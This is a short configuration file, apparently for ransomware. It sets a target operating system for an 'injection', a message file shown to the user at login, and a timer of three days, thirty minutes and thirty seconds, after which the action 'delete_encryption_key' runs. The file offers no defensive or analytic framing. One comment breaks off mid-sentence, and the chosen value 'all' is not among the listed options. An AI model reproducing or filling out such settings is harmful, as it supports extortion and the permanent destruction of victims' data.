# Sets the preferred Operating System for the Injection.
# Possible values are:
# any : Any Operating System that the
# linux : Any Linux Distribution that supports SystemD
# windows : Any Windows Operating System
# win10 : Windows 10 only
# win8 : Windows 8/8.1 only
# win7 : Windows 7 only
# win_vista : Windows Vista only
# win_xp : Windows XP only
PreferredOperatingSystem = all

# Reads the file to the Display upon injecting and restarting.
# Applies the setting at User Login.
InjectionMessageFile = message.txt

Timeout = 3d,30m,30s
TimeoutAction = delete_encryption_key